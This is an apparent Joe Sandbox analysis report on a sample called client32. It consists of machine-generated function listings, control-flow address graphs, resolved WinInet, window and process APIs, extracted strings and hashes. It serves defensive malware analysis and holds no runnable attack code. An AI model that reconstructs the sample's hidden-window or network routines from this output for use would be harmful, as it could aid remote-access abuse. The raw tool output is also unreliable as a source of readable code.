                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                • API String ID: 3291243470-2792520954
                                                                                • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                                Function 11029BB0 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 902 11029bb0-11029c3e LoadLibraryA 903 11029c41-11029c46 902->903 904 11029c48-11029c4b 903->904 905 11029c4d-11029c50 903->905 906 11029c65-11029c6a 904->906 907 11029c52-11029c55 905->907 908 11029c57-11029c62 905->908 909 11029c99-11029ca5 906->909 910 11029c6c-11029c71 906->910 907->906 908->906 911 11029d4a-11029d4d 909->911 912 11029cab-11029cc3 call 11163a11 909->912 913 11029c73-11029c8a GetProcAddress 910->913 914 11029c8c-11029c8f 910->914 916 11029d68-11029d80 InternetOpenA 911->916 917 11029d4f-11029d66 GetProcAddress 911->917 923 11029ce4-11029cf0 912->923 924 11029cc5-11029cde GetProcAddress 912->924 913->914 918 11029c91-11029c93 SetLastError 913->918 914->909 921 11029da4-11029db0 call 11163aa5 916->921 917->916 920 11029d99-11029da1 SetLastError 917->920 918->909 920->921 930 11029db6-11029de7 call 11142e60 call 11165250 921->930 931 1102a02a-1102a034 921->931 929 11029cf2-11029cfb GetLastError 923->929 932 11029d11-11029d13 923->932 924->923 926 11029d82-11029d8a SetLastError 924->926 926->929 929->932 933 11029cfd-11029d0f call 11163aa5 call 11163a11 929->933 952 11029de9-11029dec 930->952 953 11029def-11029e04 call 11081d30 * 2 930->953 931->903 935 1102a03a 931->935 937 11029d30-11029d3c 932->937 938 11029d15-11029d2e GetProcAddress 932->938 933->932 940 1102a04c-1102a04f 935->940 937->911 956 11029d3e-11029d47 937->956 938->937 944 11029d8f-11029d97 SetLastError 938->944 941 1102a051-1102a056 940->941 942 1102a05b-1102a05e 940->942 948 1102a1bf-1102a1c7 941->948 949 1102a060-1102a065 942->949 950 1102a06a 942->950 944->911 954 1102a1d0-1102a1e3 948->954 955 1102a1c9-1102a1ca FreeLibrary 948->955 957 1102a18f-1102a194 949->957 958 1102a06d-1102a075 950->958 952->953 976 11029e06-11029e0a 953->976 977 11029e0d-11029e19 953->977 955->954 956->911 963 1102a196-1102a1ad GetProcAddress 957->963 964 1102a1af-1102a1b5 957->964 961 1102a077-1102a08e GetProcAddress 958->961 962 1102a094-1102a09d 958->962 961->962 966 1102a14e-1102a150 SetLastError 961->966 970 1102a0a0-1102a0a2 962->970 963->964 967 1102a1b7-1102a1b9 SetLastError 963->967 964->948 968 1102a156-1102a15d 966->968 967->948 972 1102a16c-1102a18d call 11027f00 * 2 968->972 970->968 974 1102a0a8-1102a0ad 970->974 972->957 974->972 978 1102a0b3-1102a0ef call 11110230 call 11027eb0 974->978 976->977 980 11029e44-11029e49 977->980 981 11029e1b-11029e1d 977->981 1000 1102a101-1102a103 978->1000 1001 1102a0f1-1102a0f4 978->1001 983 11029e4b-11029e5c GetProcAddress 980->983 984 11029e5e-11029e75 InternetConnectA 980->984 986 11029e34-11029e3a 981->986 987 11029e1f-11029e32 GetProcAddress 981->987 983->984 989 11029ea1-11029eac SetLastError 983->989 990 1102a017-1102a027 call 11162777 984->990 991 11029e7b-11029e7e 984->991 986->980 987->986 993 11029e3c-11029e3e SetLastError 987->993 989->990 990->931 996 11029e80-11029e82 991->996 997 11029eb9-11029ec1 991->997 993->980 1002 11029e84-11029e97 GetProcAddress 996->1002 1003 11029e99-11029e9f 996->1003 1004 11029ec3-11029ed7 GetProcAddress 997->1004 1005 11029ed9-11029ef4 997->1005 1008 1102a105 1000->1008 1009 1102a10c-1102a111 1000->1009 1001->1000 1007 1102a0f6-1102a0fa 1001->1007 1002->1003 1010 11029eb1-11029eb3 SetLastError 1002->1010 1003->997 1004->1005 1011 11029ef6-11029efe SetLastError 1004->1011 1012 11029f01-11029f04 1005->1012 1007->1000 1013 1102a0fc 1007->1013 1008->1009 1014 1102a113-1102a129 call 110d12e0 1009->1014 1015 1102a12c-1102a12e 1009->1015 1010->997 1011->1012 1018 1102a012-1102a015 1012->1018 1019 11029f0a-11029f0f 1012->1019 1013->1000 1014->1015 1021 1102a130-1102a132 1015->1021 1022 1102a134-1102a145 call 11162777 1015->1022 1018->990 1025 1102a03c-1102a049 call 11162777 1018->1025 1023 11029f11-11029f28 GetProcAddress 1019->1023 1024 11029f2a-11029f36 1019->1024 1021->1022 1027 1102a15f-1102a169 call 11162777 1021->1027 1022->972 1037 1102a147-1102a149 1022->1037 1023->1024 1029 11029f38-11029f40 SetLastError 1023->1029 1036 11029f42-11029f5b GetLastError 1024->1036 1025->940 1027->972 1029->1036 1038 11029f76-11029f8b 1036->1038 1039 11029f5d-11029f74 GetProcAddress 1036->1039 1037->958 1042 11029f95-11029fa3 GetLastError 1038->1042 1039->1038 1040 11029f8d-11029f8f SetLastError 1039->1040 1040->1042 1043 11029fa5-11029faa 1042->1043 1044 11029fac-11029fb8 GetDesktopWindow 1042->1044 1043->1044 1047 1102a002-1102a007 1043->1047 1045 11029fd3-11029fef 1044->1045 1046 11029fba-11029fd1 GetProcAddress 1044->1046 1045->1018 1051 11029ff1 1045->1051 1046->1045 1048 11029ff6-1102a000 SetLastError 1046->1048 1047->1018 1049 1102a009-1102a00f 1047->1049 1048->1018 1049->1018 1051->1012
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(WinInet.dll,1B702977,757323A0,?,00000000), ref: 11029BE5
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                • _malloc.LIBCMT ref: 11029CB7
                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                • GetLastError.KERNEL32 ref: 11029CF2
                                                                                • _free.LIBCMT ref: 11029CFE
                                                                                • _malloc.LIBCMT ref: 11029D07
                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                • _free.LIBCMT ref: 11029DA5
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                • API String ID: 921868004-913974648
                                                                                • Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                                • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                • Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                                • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                  • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                • _fgets.LIBCMT ref: 110628E2
                                                                                • _strpbrk.LIBCMT ref: 11062949
                                                                                • _fgets.LIBCMT ref: 11062A4C
                                                                                • _strpbrk.LIBCMT ref: 11062AC3
                                                                                • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                • _fgets.LIBCMT ref: 11062B55
                                                                                • _strpbrk.LIBCMT ref: 11062B7B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                • API String ID: 716802716-1571441106
                                                                                • Opcode ID: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                • Opcode Fuzzy Hash: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                                Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1777 11139ed0-11139f05 1778 11139f12-11139f19 1777->1778 1779 11139f07-11139f0d GetCurrentThreadId 1777->1779 1780 11139f20-11139f3c call 11134830 call 11134310 1778->1780 1781 11139f1b call 11029950 1778->1781 1779->1778 1787 11139f42-11139f48 1780->1787 1788 1113a01b-1113a022 1780->1788 1781->1780 1791 1113a59a-1113a5b5 call 11162bb7 1787->1791 1792 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 1787->1792 1789 1113a0da-1113a0f0 1788->1789 1790 1113a028-1113a02f 1788->1790 1802 1113a0f6-1113a0fd 1789->1802 1803 1113a22f 1789->1803 1790->1789 1794 1113a035-1113a03c 1790->1794 1824 1113a011 1792->1824 1825 11139fb1-11139fb7 1792->1825 1794->1789 1797 1113a042-1113a051 FindWindowA 1794->1797 1797->1789 1801 1113a057-1113a05c IsWindowVisible 1797->1801 1801->1789 1805 1113a05e-1113a065 1801->1805 1806 1113a0ff-1113a109 1802->1806 1807 1113a10e-1113a12e call 1105e820 1802->1807 1808 1113a231-1113a242 1803->1808 1809 1113a275-1113a280 1803->1809 1805->1789 1813 1113a067-1113a08c call 11139a70 IsWindowVisible 1805->1813 1806->1809 1807->1809 1830 1113a134-1113a163 1807->1830 1815 1113a244-1113a254 1808->1815 1816 1113a25a-1113a26f 1808->1816 1810 1113a282-1113a2a2 call 1105e820 1809->1810 1811 1113a2b6-1113a2bc 1809->1811 1832 1113a2b0 1810->1832 1833 1113a2a4-1113a2ae call 1102d750 1810->1833 1819 1113a2be-1113a2ca call 11139a70 1811->1819 1820 1113a2cd-1113a2d5 1811->1820 1813->1789 1836 1113a08e-1113a09d IsIconic 1813->1836 1815->1816 1816->1809 1819->1820 1828 1113a2e7 1820->1828 1829 1113a2d7-1113a2e2 call 1106c340 1820->1829 1824->1788 1825->1824 1834 11139fb9-11139fd0 call 11147060 GetForegroundWindow 1825->1834 1838 1113a2e7 call 1112ddd0 1828->1838 1829->1828 1844 1113a165-1113a179 call 11081d30 1830->1844 1845 1113a17e-1113a191 call 11143e00 1830->1845 1832->1811 1833->1811 1856 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 1834->1856 1857 11139ffe-1113a000 1834->1857 1836->1789 1842 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 1836->1842 1839 1113a2ec-1113a2f2 1838->1839 1846 1113a2f4-1113a2fa call 11132a10 1839->1846 1847 1113a2fd-1113a306 1839->1847 1878 1113a0cb-1113a0d4 EnableWindow 1842->1878 1879 1113a0bc-1113a0c2 1842->1879 1844->1845 1870 1113a17b 1844->1870 1871 1113a193-1113a1a4 GetLastError call 11147060 1845->1871 1872 1113a1ae-1113a1b5 1845->1872 1846->1847 1854 1113a314 call 111326b0 1847->1854 1855 1113a308-1113a30b 1847->1855 1864 1113a319-1113a31f 1854->1864 1855->1864 1865 1113a30d-1113a312 call 11132780 1855->1865 1856->1857 1857->1824 1859 1113a002-1113a008 1857->1859 1859->1824 1868 1113a00a-1113a00b SetForegroundWindow 1859->1868 1874 1113a325-1113a32b 1864->1874 1875 1113a429-1113a434 call 11139600 1864->1875 1865->1864 1868->1824 1870->1845 1871->1872 1882 1113a1b7-1113a1d2 1872->1882 1883 1113a228 1872->1883 1884 1113a331-1113a339 1874->1884 1885 1113a3db-1113a3e3 1874->1885 1893 1113a436-1113a448 call 110642e0 1875->1893 1894 1113a455-1113a45b 1875->1894 1878->1789 1879->1878 1888 1113a0c4-1113a0c5 SetForegroundWindow 1879->1888 1896 1113a1d5-1113a1e1 1882->1896 1883->1803 1884->1875 1891 1113a33f-1113a345 1884->1891 1885->1875 1889 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 1885->1889 1888->1878 1889->1875 1891->1875 1897 1113a34b-1113a362 call 111101b0 1891->1897 1893->1894 1915 1113a44a-1113a450 call 11142d90 1893->1915 1901 1113a461-1113a468 1894->1901 1902 1113a58a-1113a592 1894->1902 1903 1113a1e3-1113a1f7 call 11081d30 1896->1903 1904 1113a1fc-1113a209 call 11143e00 1896->1904 1912 1113a384 1897->1912 1913 1113a364-1113a382 call 11057eb0 1897->1913 1901->1902 1909 1113a46e-1113a487 call 1105e820 1901->1909 1902->1791 1903->1904 1918 1113a1f9 1903->1918 1904->1883 1920 1113a20b-1113a226 GetLastError call 11147060 1904->1920 1909->1902 1929 1113a48d-1113a4a0 1909->1929 1921 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 1912->1921 1913->1921 1915->1894 1918->1904 1920->1809 1921->1875 1956 1113a3d4-1113a3d9 call 110ec320 1921->1956 1936 1113a4a2-1113a4a8 1929->1936 1937 1113a4cd-1113a4d3 1929->1937 1940 1113a4aa-1113a4c8 call 11147060 GetTickCount 1936->1940 1941 1113a4d9-1113a4e5 GetTickCount 1936->1941 1937->1902 1937->1941 1940->1902 1941->1902 1945 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 1941->1945 1963 1113a530-1113a535 1945->1963 1956->1875 1963->1963 1964 1113a537-1113a53d 1963->1964 1965 1113a540-1113a545 1964->1965 1965->1965 1966 1113a547-1113a571 call 1112d6e0 1965->1966 1969 1113a573-1113a574 FreeLibrary 1966->1969 1970 1113a57a-1113a587 call 11162777 1966->1970 1969->1970 1970->1902
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                                • IsWindow.USER32(00040310), ref: 11139F65
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139F73
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139FAB
                                                                                • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                • EnableWindow.USER32(00040310,00000000), ref: 11139FE0
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 11139FFC
                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                                • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                • IsWindowVisible.USER32(00040310), ref: 1113A088
                                                                                • IsIconic.USER32(00040310), ref: 1113A095
                                                                                • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00040310,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00040310,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 1113A0D4
                                                                                • GetLastError.KERNEL32 ref: 1113A193
                                                                                • GetLastError.KERNEL32 ref: 1113A20B
                                                                                • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                  • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                • API String ID: 2511061093-2542869446
                                                                                • Opcode ID: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                                • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                • Opcode Fuzzy Hash: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                                • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                                Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1973 11134830-1113486c 1974 11134872-11134894 call 1105e820 1973->1974 1975 11134b94-11134baf call 11162bb7 1973->1975 1974->1975 1980 1113489a-111348ae GetLocalTime 1974->1980 1981 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 1980->1981 1982 111348b0-111348cc call 11147060 1980->1982 1989 11134955-1113496b GetProcAddress 1981->1989 1990 1113496d-11134974 GetProcessHandleCount 1981->1990 1982->1981 1989->1990 1991 11134976-11134978 SetLastError 1989->1991 1992 1113497e-11134986 1990->1992 1991->1992 1993 111349a2-111349ae 1992->1993 1994 11134988-111349a0 GetProcAddress 1992->1994 1996 111349b0-111349c8 GetProcAddress 1993->1996 1998 111349ca-111349d5 1993->1998 1994->1993 1995 111349d7-111349e2 SetLastError 1994->1995 1995->1996 1996->1998 1999 111349e4-111349ec SetLastError 1996->1999 2000 111349ef-111349ff GetProcAddress 1998->2000 1999->2000 2002 11134a01-11134a0d K32GetProcessMemoryInfo 2000->2002 2003 11134a0f-11134a11 SetLastError 2000->2003 2004 11134a17-11134a25 2002->2004 2003->2004 2005 11134a33-11134a3e 2004->2005 2006 11134a27-11134a2f 2004->2006 2007 11134a40-11134a48 2005->2007 2008 11134a4c-11134a57 2005->2008 2006->2005 2007->2008 2009 11134a65-11134a6f 2008->2009 2010 11134a59-11134a61 2008->2010 2011 11134a71-11134a78 2009->2011 2012 11134a7a-11134a7d 2009->2012 2010->2009 2013 11134a7f-11134a8d call 11147060 2011->2013 2012->2013 2014 11134a90-11134aa2 2012->2014 2013->2014 2018 11134b6a-11134b78 2014->2018 2019 11134aa8-11134aba call 110642e0 2014->2019 2020 11134b7a-11134b7b FreeLibrary 2018->2020 2021 11134b7d-11134b85 2018->2021 2019->2018 2027 11134ac0-11134ae1 call 1105e820 2019->2027 2020->2021 2023 11134b87-11134b88 FreeLibrary 2021->2023 2024 11134b8a-11134b8f 2021->2024 2023->2024 2024->1975 2026 11134b91-11134b92 FreeLibrary 2024->2026 2026->1975 2030 11134ae3-11134ae9 2027->2030 2031 11134aef-11134b0b call 1105e820 2027->2031 2030->2031 2033 11134aeb 2030->2033 2035 11134b16-11134b32 call 1105e820 2031->2035 2036 11134b0d-11134b10 2031->2036 2033->2031 2040 11134b34-11134b37 2035->2040 2041 11134b3d-11134b59 call 1105e820 2035->2041 2036->2035 2037 11134b12 2036->2037 2037->2035 2040->2041 2042 11134b39 2040->2042 2045 11134b60-11134b63 2041->2045 2046 11134b5b-11134b5e 2041->2046 2042->2041 2045->2018 2047 11134b65 call 11027de0 2045->2047 2046->2045 2046->2047 2047->2018
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,1B702977), ref: 1113489E
                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
